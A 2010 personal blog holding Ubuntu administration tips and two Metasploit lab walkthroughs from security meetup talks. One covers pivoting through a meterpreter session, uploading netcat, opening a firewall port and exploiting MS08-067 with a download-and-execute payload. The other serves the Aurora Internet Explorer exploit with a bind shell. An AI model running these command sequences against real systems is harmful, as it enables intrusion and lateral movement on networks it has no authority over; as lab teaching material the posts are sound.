Search This Blog

Sunday, November 28, 2010

[n|u Delhi Presentations] Post exploitation techniques...

There was a presentation on "Post exploitation techniques using msf-nc kungfu" in null monthly meet.
So here is post about the presentation and things I may have missed.

Aim:
There is a compromised machine in a network and you want to find/target other nodes inside the network.

Scenario:
Attacker running BackTrack sitting outside the network. Machine A (Pivot) and machine B behind the NAT.



So here we go with the meterpreter session on pivot machine:

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:1e:d3:76
IP Address : 192.168.74.128
Netmask : 255.255.255.0


meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.74.2
127.0.0.0 255.0.0.0 127.0.0.1
192.168.74.0 255.255.255.0 192.168.74.128
192.168.74.128 255.255.255.255 127.0.0.1
192.168.74.255 255.255.255.255 192.168.74.128
224.0.0.0 240.0.0.0 192.168.74.128
255.255.255.255 255.255.255.255 192.168.74.128

meterpreter >

1. Pass the traffic for desired subnet through meterpreter session:
So, in order to run scans and use other modules of meterpreter, we would need to add route so that when we target a particular subnet it will be routed through meterpreter session.
Let's see, how we can do that...

Back on the multi/handler...

msf exploit(handler) > route add 192.168.74.0 255.255.255.0 1
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.74.0 255.255.255.0 Session 1

msf exploit(handler) >

So now the network traffic meant for subnet 192.168.74.0/24 would be routed through meterpreter session 1.

2. Enumerate the nodes inside the network:
We will be using meterpreter module arp_scanner to scan the network.

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run arp_scanner -h
Meterpreter Script for performing an ARPS Scan Discovery.

OPTIONS:

-h Help menu.
-i Enumerate Local Interfaces
-r The target address range or CIDR identifier
-s Save found IP Addresses to logs.


meterpreter > run arp_scanner -r 192.168.74.0/24
[*] ARP Scanning 192.168.74.0/24
[*] IP: 192.168.74.1 MAC 0:50:56:c0:0:8
[*] IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5
[*] IP: 192.168.74.128 MAC 0:c:29:1e:d3:76
[*] IP: 192.168.74.129 MAC 0:c:29:7e:bd:74
[*] IP: 192.168.74.254 MAC 0:50:56:e5:a:b0
meterpreter >


Ok. As you can see, there are 5 IP addresses seems alive in the network.
The IP address 192.168.74.1, 192.168.74.2 and 192.168.74.254 are of VMware workstation virtual network adapters.
The distribution is like
192.168.74.2 - gateway IP address of virtual machine behind NAT
192.168.74.1 - external IP address(vmnet8)
192.168.74.254 - DHCP server for virtual machines behind NAT

So, apart from all that, there is one more virtual machine which can be of our interest.
Let's find out...



We will use tcp portscanner auxiliary module to find out the open ports...(with some well-known ports)

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output

msf auxiliary(tcp) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf auxiliary(tcp) > set PORTS 21,22,23,25,80,110,135,139,443,445
PORTS => 21,22,23,25,80,110,135,139,443,445
msf auxiliary(tcp) > run

[*] 192.168.74.129:139 - TCP OPEN
[*] 192.168.74.129:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Alright. So there seems to be sharing enabled on the target machine.
We will use infamous ms08_067 exploit...

But, now there are problems choosing appropriate payload.
- Bindshell payload can't be used, as we have no direct access to machine B. So even if machine B gets infected and starts listening on some port specified by the payload, we won't be able to connect to it.
- Reverse connect payloads also can't be used, assuming the situation that machine B has no direct internet access.

So, all I did was uploaded netcat and a custom file which is combination of a HTTP-response appended with meterpreter client executable(in this case if successful, of course, it would reverse connect back to the listening multi/handler on attacker's machine and so to confirm that the exploit was successful).

Let's do that...

meterpreter > upload /tmp/netcat.exe /tmp/httpresponse-msf.cfg %temp%
[*] uploading : /tmp/netcat.exe -> %temp%
[*] uploaded : /tmp/netcat.exe -> %temp%\netcat.exe
[*] uploading : /tmp/httpresponse-msf.cfg -> %temp%
[*] uploaded : /tmp/httpresponse-msf.cfg -> %temp%\httpresponse-msf.cfg
meterpreter >

Ok.
So now we will start a small webserver using netcat on pivot machine with redirecting httpresponse-msf.cfg(can have any extension).

meterpreter > execute -H -f cmd.exe -c -i
Process 256 created.
Channel 9 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>cd %temp%
cd %temp%

C:\DOCUME~1\user\LOCALS~1\Temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 080D-40BD

Directory of C:\DOCUME~1\user\LOCALS~1\Temp

12/05/2010 01:57 AM <DIR> .
12/05/2010 01:57 AM <DIR> ..
10/23/2009 07:30 PM 8,704 21227.mst
10/23/2009 07:30 PM 8,704 21ad2.mst
10/23/2009 07:30 PM 8,704 48f1e.mst
10/23/2009 07:30 PM 8,704 c833.mst
08/15/2009 02:54 AM 8,704 ff21.mst
12/05/2010 01:57 AM 74,144 httpresponse-msf.cfg
12/05/2010 01:57 AM 61,440 netcat.exe
10/23/2009 07:30 PM 33,709 vminst.log_20091023_193054.log
06/10/2010 11:06 AM 41,986 vminst.log_20100610_110602.log
09/24/2010 12:47 PM 45,686 vminst.log_20100924_124718.log
09/28/2010 04:41 PM 45,537 vminst.log_20100928_164134.log
11/29/2010 03:53 PM 45,537 vminst.log_20101129_155316.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054_Failed.log
06/10/2010 11:06 AM 2,958,144 vmmsi.log_20100610_110601.log
09/24/2010 12:47 PM 3,008,988 vmmsi.log_20100924_124718.log
09/28/2010 04:41 PM 2,960,554 vmmsi.log_20100928_164134.log
11/29/2010 03:53 PM 2,958,778 vmmsi.log_20101129_155316.log
11/29/2010 03:54 PM <DIR> VMwareDnD
18 File(s) 17,424,123 bytes
3 Dir(s) 40,819,601,408 bytes free

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>




Oops. Looks like somebody is interfering with our business.
The firewall on pivot machine may interfere to open a port on listening mode.
But, we got access of this machine and here is how we can add an exception in firewall...

C:\DOCUME~1\user\LOCALS~1\Temp>netsh firewall set portopening tcp 80 nc enable all
netsh firewall set portopening tcp 80 nc enable all
Ok.


C:\DOCUME~1\user\LOCALS~1\Temp>


Ok. So now we were able to open port number 80 and enabled it for listening mode.
Alright, so let's run netcat as we had done once again.

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>exit
exit
^C
Terminate channel 9? [y/N] y
meterpreter >

All set. Now set the parameters and run ms08_067 for machine B...

meterpreter > background
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.74.129
RHOST => 192.168.74.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf exploit(ms08_067_netapi) > set URL http://192.168.74.128/
URL => http://192.168.74.128/
msf exploit(ms08_067_netapi) > show options
Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.74.129 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/download_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
URL http://192.168.74.128/ yes The pre-encoded URL to the executable


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] 172.16.24.1:36593 Request received for /Af4IZ...
[*] 172.16.24.1:36593 Staging connection for target f4IZ received...
[*] Patching Target ID f4IZ into DLL
[*] 172.16.24.1:45245 Request received for /Bf4IZ...
[*] 172.16.24.1:45245 Stage connection for target f4IZ received...
[*] Meterpreter session 2 opened (172.16.24.130:443 -> 172.16.24.1:45245) at 2010-12-04 20:57:45 +0000

msf exploit(ms08_067_netapi) >

Here we go...
As we can see, the exploit was successful and it opened meterpreter session 2 connecting back to the attacker's machine.

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINXP 172.16.24.130:443 -> 172.16.24.1:45245

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:7e:bd:74
IP Address : 192.168.74.129
Netmask : 255.255.255.0


meterpreter >



..............Done!!!

Thursday, November 18, 2010

SSH to server without any password...

You want the access of SSH server and don't wish to enter password all the times while connecting to the server. This can be the case someone using scp very frequently to copy multiple files from server to client or vice versa.

Scenario: User a on host A(client) want to access host B(server) having SSH server(OpenSSH) running on it, with access-without-password feature. :-)

Steps:

a@ubuntu_A:~$ ssh-keygen -t rsa
a@ubuntu_A:~$ ssh b@ubuntu_B mkdir -p .ssh
a@ubuntu_A:~$ cat .ssh/id_rsa.pub | ssh b@ubuntu_B 'cat >> .ssh/authorized_keys2'
b@ubuntu_B's password:
a@ubuntu_A:~$
a@ubuntu_A:~$ ssh b@ubuntu_B

Last login: Thu Nov 18 09:48:06 2010 from 192.168.1.102
b@ubuntu_B:~$

OR

Just came across this alternative...check this out:
a@ubuntu_A:~$ ssh-copy-id b@ubuntu_B
b@ubuntu_B's password:
a@ubuntu_A:~$ ssh b@ubuntu_B

Last login: Thu Nov 18 09:48:06 2010 from 192.168.1.102
b@ubuntu_B:~$

References:
http://linuxproblem.org/art_9.html
http://www.csua.berkeley.edu/~ranga/notes/ssh_nopass.html

..............Done!!!

Monday, September 27, 2010

Install 32 bit application on 64 bit Ubuntu...

There can be requirement in many cases, when you want to install some 32 bit applications on 64 bit OS environment.
I faced this problem, when I had to install GoogleEarth for my Ubuntu Lucid Lynx 64 bit OS.

ubuntu@localhost:~$ sudo ./GoogleEarthLinux-5.1.bin
[sudo] password for ubuntu:
Verifying archive integrity... All good.
Uncompressing Google Earth for GNU/Linux 5.1.3535.3218...............................................................
setup.data/bin/Linux/amd64/setup.gtk2: error while loading shared libraries: libxml2.so.2: cannot open shared object file: No such file or directory
setup.data/bin/Linux/amd64/setup.gtk: error while loading shared libraries: libSM.so.6: cannot open shared object file: No such file or directory
The setup program seems to have failed on amd64

Fatal error, installer failed to run at all!
ubuntu@localhost:~$


So, to achieve this, all you need to do is install ia32-libs, and we are good to go.

ubuntu@localhost:~$ sudo apt-get install ia32-libs

There are other ways though, to make 32 bit applications run on 64 bit OS.
Refer this link for more options.

..............Done!!!

Tuesday, September 21, 2010

[Howto] Install Origami on Ubuntu...

Origami : parser, analyzer for PDF documents.
Install ruby and required dependencies, all-in-one command...

ubuntu@localhost:~$ sudo apt-get install ruby libgtk2-ruby libopenssl-ruby libssl-dev openssl

..............Done!!!

Monday, July 12, 2010

Share folders in Ubuntu server using through CLI...

Change the samba configuration file located at /etc/samba/smb.conf as follows...
i. For authentication-based-access, append...
[private]
comment = Private Share
path = /tmp/pri-share
browseable = no
read only = no

ii. For anonymous-read-only access
[public]
comment = Public Share
path = /tmp/pub-share
read only = no
guest only = yes
guest ok = yes
Be sure, while accessing the shares from either windows or linux box, you are using 'private' of 'public' as share names instead 'pri-share' and 'pub-share'.

e.g. \\192.168.1.10\private
smb://192.168.1.10/private


..............Done!!!

Tuesday, July 6, 2010

Python tools for penetration testers...

Found this list(in a blogpost by Dirk Loss) very interesting which may help a pen-tester...
Enjoy...

http://dirk-loss.de/python-tools.htm

Thursday, June 24, 2010

Install Apache, PHP and MySQL(all in one shot), on Ubuntu server...

This will help you make setup an Ubuntu server and make it work as LAMP(L-Linux, A-Apache, M-MySQL and P-PHP). So, follow the steps:

1. For PHP5, install apache, mysql and php5 alongside the necessary modules with following single line command.

root@localhost:~# apt-get install apache2 php5 libapache2-mod-php5


root@localhost:~# apt-get install mysql-server mysql-client libapache2-mod-auth-mysql php5-mysql


2. For PHP4...

root@localhost:~# apt-get install apache2 php4 libapache2-mod-php4


root@localhost:~# apt-get install mysql-server mysql-client libapache2-mod-auth-mysql php4-mysql


..............Done!!!

Tuesday, June 1, 2010

Add script to run at bootup in Ubuntu...

Steps as follows:
1. First of all, give your script-file executable permissions.
user@localhost:~$ chmod +x script-file.sh


2. Move your script-file to /etc/init.d directory.
user@localhost:~$ sudo mv script-file.sh /etc/init.d


3. Update Init script links, by running following command
user@localhost:~$ sudo update-rc.d script-file.sh defaults

Remember, these steps would help you run a script on bootup, NOT AT LOGIN.

When you append, your commands in ".bashrc" file. In this case, the commands will be executed when that particular user is logged in.

There is difference.

..............Done!!!

Sunday, May 30, 2010

For your own security...

This was really a cool one...read it.

How security is important for your safety...lolz....funny :P

indian comics, webcomic, free comics, online indian comics, jokes

Thursday, May 20, 2010

Setup fpt server(ProFtpd) on Ubuntu box...

The steps as follows:
1. Install ProFtpd server
user@localhost:~$ sudo apt-get install proftpd

2. For security reasons, the ftp user shouldn't have direct access to the system. So, we associate "/bin/false" shell with the newly created user. For that, append "/bin/false" to /etc/shells file.
user@localhost:~$ sudo echo "/bin/false" >> /etc/shells

3. Create ftp user, pointing user's shell to /bin/false.
user@localhost:~$ sudo useradd <ftp-username> -d <home-dir-path-ftp-user> -s /bin/false

4. Set the password for created user.
user@localhost:~$ sudo passwd <ftp-username>

5. Configure the proftpd.conf in accordance with your needs.
user@localhost:~$ sudo nano /etc/proftpd/proftpd.conf


..............Done!!!

Friday, May 7, 2010

[TOOL] TMAC for Linux...

TMAC, a simple bash program, written for the purpose of changing the MAC address of Network Interface Card (NIC) in Linux based system, provided it has Bash environment.

This tool attempts to change the MAC address of Network Inteface Cards (NIC) in Linux systems by choosing a randomly-generated MAC address. The chosen MAC address is randomised in following way:
-It chooses it's first 3 octets needed for MAC address from a list of MAC vendors list provided from IEEE, which can be found here.
-The rest 3 octets are a set of complete randomly-generated hexadecimal numbers obtained with help of Psuedo-random-generator system variable.

All it needs is a Linux machine with BASH shell environment.

Looking at the subject, many people would have already been saying that "What the heck? Why do I need a MAC-address-changer for my linux? When I already have 'one-command-solution' for that. Its so simple...

user@localhost:~$ sudo ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx

See? It's done."

But, isn't that a pain, when you have to do the same thing everytime you login to your system?
The response I would expect is "What crap? All I need to do is - just put that command in $HOME/.bashrc. It's simple as that."

Now, what if, you want to randomize it each and everytime you login to your system?
"mmm... [:-/] "
And, what if, you are setting the MAC address of your NIC with some random hex-chars, whose vendor still to be born on the earth?
"mmm... [:-/] "

So, the purpose of making this tool, was to generate a random-MAC address from a KNOWN MAC-vendors list and assigning the same to specified device.
That is why, effectively, it needs 2 files to work. One, a text file containing a list of MAC-vendors, used "AS IS" from IEEE's website and other one, being the bash program.

Also, there can be a question like "Why, on the earth, do I ever need to change my MAC address?"
I would ask those ones with this question in mind to go through this link.

Well Google, anyway knows a lot about you and me.

Moreover, if you want to make this tool run each time you login and randomize your MAC address. I would suggest you, appending the command 'bash $PWD/tmac.sh -R ' in the '$HOME/.bashrc' file.

Well, for Windows users, as they already must be knowing about TMAC, Technitium MAC Address Changer. More info.

Download tmac-v1.0.tar.gz.

Tuesday, April 27, 2010

Upgrade the Linux kernel in Ubuntu...

I know, Ubuntu 9.10 comes with 'Update Manager', by default.
But, this can be helpful in case, one wish to upgrade/downgrade to the kernel of one's choice.

1. Check the current version of kernel on the system

user@localhost:~$ uname -a
Linux localhost 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 04:38:19 UTC 2010 x86_64 GNU/Linux

2. Search for the available supported kernels

user@localhost:~$ sudo apt-cache search linux-image
linux-image - Generic Linux kernel image.
linux-image-2.6.31-15-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-15-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-15-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-16-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-16-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-16-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-17-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-17-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-17-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-19-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-19-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-19-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-20-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-20-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-20-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-304-ec2 - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-305-ec2 - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-ec2 - Linux kernel image for ec2 machines
linux-image-generic - Generic Linux kernel image
linux-image-server - Linux kernel image on Server Equipment.
linux-image-virtual - Linux kernel image for virtual machines
alsa-base - ALSA driver configuration files
linux-image-2.6.31-14-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-14-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-14-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-302-ec2 - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-9-rt - Linux kernel image for version 2.6.31 on Ingo Molnar's full real time preemption patch
linux-image-rt - Rt Linux kernel image
rt2400-source - source for rt2400 wireless network driver
rt2500-source - source for rt2500 wireless network driver
rt2570-source - source for rt2570 wireless network driver
user@localhost:~$

3. Install the desired kernel

user@localhost:~$ sudo apt-get install linux-image-x.x.x-xx


..............Done!!!

Friday, April 16, 2010

Know what version of Linux distro you are on...

This will help you to identify the operating system details, in case, you have got only Shell prompt in any Linux machine.
Here is the command which will let you know, what version and distribution of Linux you are on.

user@localhost:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.10
DISTRIB_CODENAME=interpid
DISTRIB_DESCRIPTION="Ubuntu 8.10"


In case of BSD, the command given should be

user@localhost:~$ cat /etc/*version
RHEL 5.4



Furthermore, if you want to know what is the kernel version and other system information details, this will be the command that will do the job.

user@localhost:~$ uname -a
Linux localhost 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 04:38:19 UTC 2010 x86_64 GNU/Linux

..............Done!!!

Sunday, April 4, 2010

Bind multiple IPs to a single interface in Ubuntu...

I had came across a situation, where I had to assign more than one IP to a single interface to my Ubuntu host...so here are all the things that I did...

1. Backup the 'interfaces' file, before you make something crappy with the original one :P
user@localhost:~$ sudo cp /etc/network/interfaces /root/interfaces.backup
user@localhost:~$



2. Edit the 'interfaces' file and change is like...
user@localhost:~$ sudo nano /etc/network/interfaces
user@localhost:~$ cat /etc/network/interfaces
auto eth0
auto eth0:0
auto eth0:1

iface eth0 inet static
address 192.168.1.1
netmask 255.255.255.248
gateway 192.168.1.254

iface eth0:0 inet static
address 192.168.1.2
netmask 255.255.255.248
gateway 192.168.1.254

iface eth0:1 inet static
address 192.168.1.3
netmask 255.255.255.248
gateway 192.168.1.254



save it, and close the file.

3. Restart the network service...
user@localhost:~$ sudo /etc/init.d/networking restart


..............Done!!!

Wednesday, March 31, 2010

[n|u Delhi Presentations] 27th March 2010...

There was a scheduled null-meet on 27th March 2010 in IIT delhi, where I, actually, was supposed to JUST attend the meet. In fact, I was little excited to attend the presentation by Vishwas, who was going to deliver some live demonstration(actually, thats what I thought before coming to the meet[:(], but that doesn't matter) on IE8 being exploited on Windows 7 machine with ASLR and DEP enabled. [:-o]

Yes, you heard it right!
This was done by Peter Vreugdenhil in pwn2own 2010 CanSecWest contest.

You may find the detailed report here.

Well, I just thought of showing something live demonstration, so to clear some very basic terms like, a Vulnerability and an Exploit.
This can be good start for those who are new to these terms.

A vulnerability is loophole in a service.
An exploit is the penetration/doing something unusual(which is not supposed to be done by that service), by using the vulnerability.
As simple, as it sounds :)

In general scenario, an exploit is divided in two parts. The vulnerability exposure and the payload.

The payload set of machine language instructions in form of opcodes, so as to interact with the processor, and execute the part of code of attacker's choice.

The live demonstration, was about exploit IE 6 on windows XP SP2 box, with Aurora exploit(which, Google claims to be used by Chinese hackers, for the recent attacks on their servers in China). I used Metasploit framework to develop the exploit in a quicker way, and set the parameters accordingly.

So, following are the all things, what I did while demonstrating it:

1. Started the Metasploit using 'msfconsole' on my Ubuntu host
user@localhost:~$ msfconsole
                                 _       _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|

=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 537 exploits - 256 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8964 updated today (2010.03.31)

msf >


2. Searched for the 'aurora' string (as I was knowing, the such kind of keyword exists)
msf > search -t exploit aurora
[*] Searching loaded modules for pattern 'aurora'...

Exploits
========

Name Rank Description
---- ---- -----------
windows/browser/ms10_002_aurora normal Internet Explorer "Aurora" Memory Corruption

msf >

3. Selected the module
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >


4. Show parameters to be set
msf exploit(ms10_002_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(ms10_002_aurora) >


5. Set server as my Ubuntu host, so I gave the IP of my 'vmnet8' adapter, as the guest XP was on NAT
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.188.1
SRVHOST => 192.168.188.1


6. Set URIPATH to "/" for the convenience
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /


7. And here comes the second part of the Exploit i.e. Payload. I set the payload as windows/shell/bind_tcp, which is supposed to listen for a connection, Spawn a piped command shell
msf exploit(ms10_002_aurora) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp


8. At last, before you are going to exploit the target machine, re-check the parameters
msf exploit(ms10_002_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.188.1 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)


Payload options (windows/shell/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(ms10_002_aurora) >


9. Run the exploit
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.


10. Now put the URL in victim's machine


11. In console window, you can see one session is opened
msf exploit(ms10_002_aurora) >
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.
[*] Started bind handler
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.188.138
[*] Started bind handler
[*] Command shell session 1 opened (192.168.188.1:54460 -> 192.168.188.138:4444)


12. Interacting with session, by specifying session number will give u...
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>



..............Done!!!

Phheewww......

OMG, I wrote that all? ;;)

Tuesday, March 23, 2010

the blog title...

I have always been keen and telling others about
"Keeping your own system Secure, before you go behind others."
So, I just wanted to name few tools, which may help you investigate, in case, you feel like, been-infiltrated (you know, what I mean :P)

Windows:
-TCPView
-Process Explorer
-Process Monitor

Though, there is a common command line tool in windows as well as in Linux netstat.
Also, a network sniffer like Wireshark can do a lot to aid.

Remove service from startup (Ubuntu)...

Remove unwanted application after a system boot...
also, all of services used to be residing in /etc/init.d/ folder
run command as follows...

sudo update-rc.d <service-name> remove

Changing default runlevel in Ubuntu...

-Edit /etc/init/rc-sysinit.conf using any of your favourite editor(mine is nano ;))
-Find env DEFAULT_RUNLEVEL which should be set as 2, by default.
-Change it to your desirable runlevel.
-Give a reboot and you are done!

Here is a quick reference
Debian Linux runlevels
ID Description
0 Halt
1 Single-User mode
2-5 Full Multi-User with console logins and display manager if installed
6 Reboot